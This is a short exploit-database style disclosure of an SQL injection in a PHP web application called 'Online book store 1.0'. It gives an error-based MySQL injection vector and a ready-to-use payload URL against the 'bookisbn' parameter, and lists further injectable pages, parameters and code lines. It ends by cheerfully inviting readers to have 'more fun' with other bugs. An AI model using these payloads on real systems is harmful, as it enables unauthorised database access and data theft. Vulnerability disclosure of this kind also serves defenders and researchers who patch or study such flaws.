Online book store 1.0 bookisbn sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-01-15 |
Type : webapps |
Platform : php
This exploit / vulnerability Online book store 1.0 bookisbn sql injection is for educational purposes only and if it is used you will do on your own risk!
$title = $row['book_title'];
require "./template/header.php";
?>
<!-- Example row of columns -->
<p class="lead" style="margin: 25px 0"><a href="books.php">Books</a> > <?php echo $row['book_title']; ?></p> // results goes here
-------------------------------------------------------------------------------------------------------------------
Exploit POC :
# Parameter: bookisbn (GET)
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
#Payload:
http://site.com/book.php?bookisbn=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.Tables GROUP BY x)a) AND 'aJYp'='aJYp
-----------------------
Other Vulnerable Pages with Same vulnerability :
[PAGE :bookPerPub.php], [PARAM : pubid ], [Method : GET], [Vulnerable Code : Line 6 & Line 16]
[PAGE :edit_book.php], [PARAM : publisher ], [Method : POST], [Vulnerable Code : Line 13 & Line 27 & Line 31]
[PAGE :checkout.php , Function : getBookByIsbn , Defined in database_functions.php], [PARAM : $isbn ], [Method : SESSION], [Vulnerable Code : Line 30 & Line 26 in database_functions.php]
and other pages .... :)
Also you can have more fun with Other XSS bugs too :)
----